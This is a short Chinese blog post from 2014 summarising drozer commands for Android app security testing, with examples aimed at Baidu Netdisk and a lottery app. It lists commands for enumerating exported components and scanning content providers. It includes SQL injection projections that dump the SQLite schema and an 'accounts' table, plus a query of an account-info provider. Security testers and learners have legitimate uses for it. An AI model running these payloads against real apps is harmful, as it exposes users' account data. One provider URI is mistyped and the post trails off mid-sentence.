drozer使用总结

adb forward tcp:31415 tcp:31415

drozer console connect

run app.package.list -f baidu 查看包名

run app.package.info -a com.baidu.netdisk 查看包信息

run app.package.attacksurface com.baidu.netdisk 查看那些信息（包括activity、brodcast、content providers、services）被暴露

run app.activity.info -a com.baidu.netdisk 查看有那些activity被暴露

run app.activity.start --component com.baidu.netdisk com.baidu.netdisk.ui.Navigate 启动某个组件

run scanner.provider.finduris -a com.baidu.netdisk 扫描provider暴露的URI

run app.provider.query ontent://com.baidu.pcs.sso.providers.acoountprovider/accountInfo --vertical 获取信息

run scanner.provider.injection -a com.baidu.netdisk 扫描可以被注入的provider

run scanner.provider.traversal -a com.baidu.netdisk 扫描可以被遍历的provider

run app.service.info -a com.baidu.netdisk 被暴露的service

run app.provider.query content://com.vodone.caibo.sqlite.provider/accounts/ --projection "* FROM SQLITE_MASTER WHERE type='table';--" 获取数据表

--projection "* FROM accounts;--" （接上条）获取表accounts的内容

出现java错误时，在

示例：

posted @ 2014-08-30 10:39 徐小鱼阅读(277) 评论(0) 编辑收藏举报

刷新页面返回顶部

徐小鱼